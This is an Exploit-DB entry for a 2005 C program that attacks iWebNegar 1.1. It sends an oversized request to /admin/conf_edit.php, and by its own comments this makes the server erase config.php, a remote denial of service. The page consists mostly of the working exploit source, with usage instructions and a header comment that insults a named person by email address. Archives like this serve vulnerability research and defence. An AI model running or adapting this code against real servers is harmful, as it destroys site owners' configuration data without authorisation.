iWebNegar 1.1 - Configuration Nullification Denial of Service

EDB-ID:

738

CVE:


EDB Verified:

Author:

c0d3r

Type:

dos

Exploit:   /  

Platform:

PHP

Date:

2005-01-04

Vulnerable App: 
/*
    iwebnegar 1.1 remote exploit
    c0ded by root / c0d3r " kaveh razavi ": c0d3rz_team@yahoo.com
        bug found by " hossein asgary " in simorgh-ev security team ( u rux hossein )
        compile with Ms visual C++ (the php version written by the bug finder but still priv8)
        greetz : LorD & NT from IHS , vbehzadan & sIiiS from hyper-security.com ,
        Jamie & Ben from exploitdev .
        Lamer : shervin_kesafat@yahoo.com ( who can fuck him ? )
  */
  /* there is a limited buffer in the php code of iwebnegar when u overflow it , it will
      go to Die() functions which cause the erase of config.php
  */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300

 

int main (int argc, char *argv[]){



 char req[] =
          "GET /admin/conf_edit.php?";
  unsigned int rc,addr,sock ;
  struct sockaddr_in tcp;
  struct hostent * hp;
  WSADATA wsaData;
char buffer[size];

   memset(buffer,'A',300);
   memcpy(buffer,req,25);

                if(argc < 2) {
                printf("\nusage : iwebnegar host\n");
                printf("example : iwebnegar.exe 127.0.0.1\n");
                exit(-1) ;
        }
  
  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("WSAStartup failed !\n");
   exit(-1);
  }
        hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("Unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("socket() error...\n");
   exit(-1);
  }
          if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
   tcp.sin_family = AF_INET;

  tcp.sin_port=htons(80);
  
  printf("\n[+] attacking host %s\n" , argv[1]) ;
  printf("[+] Building overflow string\n");
  Sleep(1000);
  printf("[+] packet size = %d byte\n" , sizeof(buffer));
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
        Sleep(1000) ;
         printf("[+] connected\n") ;
         
         send(sock , buffer , sizeof(buffer) , 0);
        
         printf("[+] see if the config.php erased ! \n\n") ;
             
        }
  else {
  printf("the 80 port is not open try another webserver port\n");
 

  }
}

// milw0rm.com [2005-01-04]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services